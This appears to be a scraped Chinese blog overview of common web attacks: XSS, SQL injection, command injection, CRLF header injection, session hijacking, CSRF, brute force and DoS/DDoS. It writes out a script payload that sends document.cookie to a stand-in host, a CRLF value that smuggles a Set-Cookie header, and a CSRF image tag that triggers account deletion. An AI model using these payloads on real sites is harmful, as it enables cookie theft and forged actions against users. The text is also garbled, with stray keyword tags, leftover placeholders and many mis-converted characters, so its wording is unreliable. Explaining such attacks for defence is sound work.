對web的攻擊可分爲兩大類:javascript
Cross SiteScript,跨站腳本攻擊,又稱css攻擊。 css
其核心思路就是將惡意html代碼注入到目標網站中(如<script type="text/javascript">alert('boom!')</script>),因此常常發生在動態生成html的場景下。 html
攻擊成功後能夠作的事情有不少,好比將cookie發送出去,URL跳轉等。java
只要有用戶輸入的地方,數據存儲時沒有對其進行處理,用到改數據的頁面都有可能受到XSS攻擊(對於script的攻擊方式,數據以直接拍到頁面的方式纔會使攻擊生效,ajax請求到數據再經過mvvm框架渲染的方式是不會觸發腳本的執行的。但,XSS攻擊不只僅侷限於script)web
拿微博舉例,若是某人發了一段包含<script>window.open(「www.aa.com?param=」+document.cookie)</script>的微博,且XSS攻擊成功,那麼看到該微博的人都會受到攻擊,其cookie被髮送至www.aa.comajax
在web應用對數據庫的查詢,添加,刪除等操做環節,請求參數參與SQL語句生成,對於調用SQL語句的拼接環節存在疏忽,產生SQL注入攻擊。shell
舉例:todo數據庫
todoapi
web應用能夠經過shell調用系統命令,所以若是在調用時存在疏忽,就有可能執行了不被指望的OS命令。安全
%0D%0A表明HTTP報文中的換行符。好比在響應頭中的Location:www.a.com/aa?id=999
添加爲Location:www.a.com/aa?id=999%0D%0ASet-Cookie: xxxx
,那麼就會多出一個set-cookie響應頭。此外,連續出現兩次%0D%0標誌着http頭部與主體的分離,一樣能夠利用這個來修改響應主體。
指的是攻擊者經過在響應頭部字段中插入換行,添加任意響應首部的一種攻擊
話管理疏忽引發的安全漏洞
經過手段拿到用戶的會話id並以此id假裝爲用戶de攻擊。
指攻擊者經過事先設定好的陷阱,在用戶不知道的狀況下發起對某些站點的請求,從而達到修改用戶在目標網站裏的數據的攻擊。
如在a.com裏有個<img src="b.com/account/delete" />的標籤,此時用戶訪問a站點時就向b發起了delete請求,假設該接口就是b站點的刪除賬號api,且b用戶偏偏剛訪問了b站點不久,還存有未過時的cookie,那就慘了。
事先收集好一組候選密碼一一嘗試
如銀行密碼是四位數字,則窮舉便可。
連接描述
一種讓運行中的服務器呈中止中的攻擊
分佈式的多臺計算機發起的dos攻擊稱爲ddos(distributed Denial of Service)攻擊
在第三次握手環節耍流氓不響應服務器,形成tcp半鏈接狀態。不停地發送syn握手,就會形成服務器資源大大消耗。
或者tcp全鏈接,可是每一個鏈接都不釋放,最終達到服務器上限,癱瘓
1.製造大流量無用數據,形成通往被攻擊主機的網絡擁塞,使被攻擊主機沒法正常和外界通訊。
2.利用被攻擊主機提供服務或傳輸協議上處理重複鏈接的缺陷,反覆高頻的發出攻擊性的重複服務請求,使被攻擊主機沒法及時處理其它正常的請求。
3.利用被攻擊主機所提供服務程序或傳輸協議的自己實現缺陷,反覆發送畸形的攻擊數據引起系統錯誤的分配大量系統資源,使主機處於掛起狀態甚至死機。
直接使服務器掛掉,影響了公司服務正常運轉
location / { deny 1.2.3.4; }